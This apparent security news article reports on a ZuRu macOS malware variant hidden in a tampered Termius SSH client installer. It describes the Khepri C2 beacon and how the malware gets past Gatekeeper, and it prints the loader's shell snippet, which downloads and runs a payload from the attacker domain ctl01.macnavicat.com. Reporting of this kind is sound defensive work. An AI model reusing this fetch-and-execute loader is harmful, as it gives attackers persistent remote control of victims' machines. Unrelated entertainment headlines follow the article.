First seen in late May 2025, the 248 MB rogue disk image looks and behaves like the genuine installer but stealthily inserts a 25 MB Mach-O binary into the Termius Helper bundle.
Once launched, the counterfeit helper runs the legitimate .Termius Helper1 to preserve normal UX while spawning a loader dubbed .localized, which drops a modified Khepri command-and-control beacon under /tmp/.fseventsd and begins polling its operator every five seconds over port 53.
Polyswarm analysts identified the sample’s C2 pattern—ctl01.macnavicat[.]com with the Baidu decoy domain—linking it to earlier ZuRu infrastructure.
Because the implant swaps Termius’s developer signature for an ad-hoc one, Gatekeeper’s trust model is sidestepped, letting the bundle execute without notarization dialogs.
The campaign specifically targets IT staff and software engineers who favor third-party terminals, underscoring the growing risk posed by pirated or tampered productivity apps.
Beyond data theft, the enhanced beacon can transfer arbitrary files, run shell instructions, and capture output, granting operators persistent, high-fidelity control of compromised Macs.
The remainder of this report drills into the infection mechanism that makes ZuRu’s latest build both elusive and resilient.
The loader’s first task is integrity verification. It computes an MD5 hash of the resident beacon and, if the result diverges from the hard-coded checksum, silently refreshes it from the C2 before chaining execution back to the user’s session.
The logic is compact yet effective:-
EXPECTED_HASH="8ac593fbe69ae93de505003eff446424"
CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
[ "$CURRENT_HASH" != "$EXPECTED_HASH" ] && curl -s
http://ctl01.macnavicat.com/update -o /tmp/.fseventsd/Khepri
chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &This self-healing step thwarts rudimentary file-based detections by ensuring the payload is always pristine.
Coupled with the five-second heartbeat and background-daemon mode toggle, ZuRu maintains low-latency access even across reboots, highlighting how a single compromised utility can cascade into full-scale network exposure for macOS-centric engineering teams.
Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now
The post New ZuRu Malware Variant Weaponizes Termius SSH Client to Attack macOS Users appeared first on Cyber Security News.
Marvel Studios mastermind Kevin Feige has opened up about the decision to bring Robert Downey…
Project Hail Mary author Andy Weir has revealed his “only regret” about the movie, confirming…
Slay the Spire 2 developer Mega Crit has published a detailed roadmap for Slay the…
A new weekend has arrived, and today, you can save big on the 4K Movies,…
Resident Evil Requiem fans believe next month’s mysterious content update will add a new version…
Wrestlemania 42 is finally here, and I’m here in Las Vegas at Allegiant Stadium to…
This website uses cookies.